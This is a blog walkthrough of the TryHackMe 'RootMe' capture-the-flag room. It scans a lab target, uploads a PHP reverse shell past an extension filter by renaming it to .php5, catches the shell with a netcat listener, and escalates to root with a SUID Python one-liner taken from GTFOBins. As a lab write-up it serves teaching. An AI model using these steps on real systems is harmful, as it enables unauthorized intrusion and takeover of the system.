Try Hack Me: RootMe

The skills to be tested and needed to solve this room are: nmap, GoBuster, privilege escalation, SUID, find, webshell, and gtfobins.

This room was released today, 9/9/2020. Shout-out to the room creator, @reddyyZ. You can access the room at https://tryhackme.com/room/rootme

I was assigned a target IP address of 10.10.177.208. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

  • How many ports are open?
    • *
  • What version of Apache is running?
    • 2.*.**
  • What service is running on port 22?
    • S**
  • Find directories on the web server using web enumeration tool.
    • No answer needed
  • What is the hidden directory?
    • /p****/
  • user.txt
    • THM{y**_***_*_****l}
  • Search for files with SUID permission, which file is weird?
    • /u**/***/******
  • Find a form to escalate your privilege
    • No answer needed
  • root.txt
    • THM{p********_*********n}

Steps:

  1. Deploy the target machine:

2. Scan the machine using nmap. Type nmap -sC -sV 10.10.177.208

  • -sC – to scan using the default nmap scripts
  • -sV – to pull version information of open ports found during the scan
We have SSH and Web Server open

The nmap scan result above will answer the first three questions:

  • How many ports are open? *
  • What version of Apache is running? 2.*.**
  • What service is running on port 22? S**

3. Run gobuster to look for hidden directories and files on the web server. Type gobuster dir -u http://10.10.177.208 -w /usr/share/wordlists/dirb/common.txt

  • dir – to use directory/file brute-forcing mode
  • -u – is the flag to tell gobuster that we are scanning a URL
  • -w – is the flag to set the list of possible directory and file names
Directories were found

The gobuster scan result above will answer the next question:

  • What is the hidden directory? /p****/

4. Visit the hidden directory through your preferred browser. Type 10.10.177.208/p****/

Hidden directory page

5. Looks like we can use this to upload a web shell and get a reverse shell. Download the php reverse shell script here. Make sure to change the values in the script with your own IP address and a port of your choice to get a reverse shell

Here are the values you need to change in the php-reverse-shell script

6. Upon uploading the php-reverse-shell.php file, we get a “PHP not permitted” I supposed message

It looks like there is a file extension filtering here

This reminded of a recent walk-through room called Upload Vulnerabilities in tryhackme.com.

7. I tried other extensions such as jpg, and that uploaded successfully. I tried changing the magic number from PHP to jpg of “FF F8 FF DB“. That uploaded the php reverse-shell script but it won’t execute. Then, I realized maybe it is just filtering the .php extension, so I renamed the script to a .php5 extension. And that uploaded successfully too

Successfully uploaded my php reverse-shell script

8. Start a netcat listener from your attack machine. Type nc -nlvp 9999

Netcat listener running on port 9999

9. Run the php reverse-shell script by using curl. Type curl http://10.10.177.208/uploads/reverse-shell.php5

10. Go back to check on your listener if you have a connection

We got a shell!

11. Search for the user.txt using find. Type find / -type f -name user.txt 2> /dev/null

  • -type f – you are telling find to look exclusively for files
  • -name user.txt – instructing the find command to search for a file with the name “user.txt”
  • 2> /dev/null – so error messages do not show up as part of the search result
user flag location

12. Retrieve the content of user.txt. Type cat /var/www/user.txt

user flag

The screenshot above answers the question:

  • What is user.txt? THM{y**_***_*_****l}

13. Search for files with SUID permission to escalate our privilege using find. Type find / type -f -user root -perm -u=s 2> /dev/null

I blurred the one that seems to be out of place

The screenshot above will answer the question:

  • Search for files with SUID permissions, which file is weird? /u**/***/******

14. Check gtfobins on how to exploit the suid above. Access gtfobins here. Then search for the specific binary you found above and study how you can exploit through SUID.

15. Escalate our privilege to root user. Type python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

We are root user!

16. Search for root.txt. Type find / -type f -name root.txt

root flag location

17. Retrieve the content of root.txt. Type cat /root/root.txt

Found the root flag!
Room completed

I hope you had fun and learned something from following my walk-through. Please don’t forget to subscribe to my blog to get the latest update when I post new contents.

And create a free account at https://tryhackme.com

Published by lightkunyagami

https://tryhackme.com/badge/18276

Leave a comment

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: